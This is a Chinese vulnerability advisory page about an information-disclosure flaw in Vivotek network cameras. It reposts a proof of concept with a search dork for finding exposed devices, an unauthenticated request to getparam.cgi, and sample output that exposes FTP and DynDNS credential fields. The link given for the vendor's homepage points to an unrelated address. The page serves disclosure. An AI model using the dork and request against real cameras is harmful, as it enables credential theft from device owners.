发布日期:2012-07-16
更新日期:2012-07-17受影响系统:
Vivotek Vivotek Network Cameras
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 54476Vivotek是网络视频解决方案提供商。Vivotek Network Camera在实现上存在信息泄露漏洞,成功利用后可允许远程攻击者访问敏感信息。<*来源:GothicX
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!GothicX ()提供了如下测试方法:
Exploit Title: Vivotek Full Data Source CONFIG
# Date: 09/07/12
# Author: Alejandro Leon Morales [GothicX]
# Author Mail: Gothicx[at]freaknetwork[dot]in
# Author Web: www.undermx.blogspot.mx
# Sofware web: www.vivotek.com
# Vulnerable version: all
# Tested on: Microsoft windows 7 / Vista / XP/ MacOS
# Dork: "/setup/config.html" ||allinurl:"setup/parafile.html"
[PoC]
http://www.example.com/cgi-bin/admin/getparam.cgi
[INFO SENSIBLE]ACCOUNT FTP
ACCOUNT DYNDNS[Result]ddns_enable="1"
ddns_provider="DyndnsDynamic"
ddns_Safe100_hostname=""
ddns_Safe100_usernameemail=""
ddns_Safe100_passwordkey=""
ddns_DyndnsDynamic_hostname="hostname"
ddns_DyndnsDynamic_usernameemail="usernameemail"
ddns_DyndnsDynamic_passwordkey="passwordkey"
ddns_DyndnsCustom_hostname=""
ddns_DyndnsCustom_usernameemail=""
ddns_DyndnsCustom_passwordkey=""
ddns_TZO_hostname=""
ddns_TZO_usernameemail=""
ddns_TZO_passwordkey=""
ddns_DHS_hostname=""
ddns_DHS_usernameemail=""
ddns_DHS_passwordkey=""
ddns_DynInterfree_hostname=""
ddns_DynInterfree_usernameemail=""
ddns_DynInterfree_passwordkey=""
ddns_CustomSafe100_hostname=""
ddns_CustomSafe100_usernameemail=""
ddns_CustomSafe100_passwordkey=""
ddns_CustomSafe100_servername=""
server_i0_type="ftp"
server_i0_http_url="http://"
server_i0_http_username=""
server_i0_http_passwd=""
server_i0_ftp_address="FTPADDRESS"
server_i0_ftp_username="FTPUSERNAME"
server_i0_ftp_passwd="FTPPASSWD"
server_i0_ftp_port="21"
server_i0_ftp_passive="1"
server_i0_ftp_location="\temp\record"
----------------------------------------------------------------------------------------------------
[Sensitive data]FTP ACCOUNTS: server_i0_ftp_address="FTPADDRESS"
server_i0_ftp_username="FTPUSERNAME"
server_i0_ftp_passwd="FTPPASSWD"DYNDNS ACCOUNTS: ddns_DyndnsDynamic_hostname="hostname"
ddns_DyndnsDynamic_usernameemail="usernameemail"
ddns_DyndnsDynamic_passwordkey="passwordkey"
//*************************************************************************************//建议:
--------------------------------------------------------------------------------
厂商补丁:Vivotek
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://ebdemo.8800.org:17151/Telnet FTP Server "PASV"命令远程内存破坏漏洞ALLMediaServer栈缓冲区溢出漏洞相关资讯 信息泄露漏洞 Vivotek
- Windows辅助功能驱动程序信息泄露 (11/13/2013 12:25:31)
- 多个Vivotek IP摄像机远程身份验证 (05/03/2013 07:10:43)
- 多个Vivotek IP摄像机远程缓冲区溢 (05/02/2013 17:15:31)
| - 多个Vivotek IP摄像机命令注入漏洞 (05/03/2013 07:11:23)
- 多个Vivotek IP摄像机目录遍历漏洞 (05/02/2013 17:17:16)
- HP Intelligent Management Center (04/10/2013 20:57:35)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上述条款
|
|
易网时代-编程资源站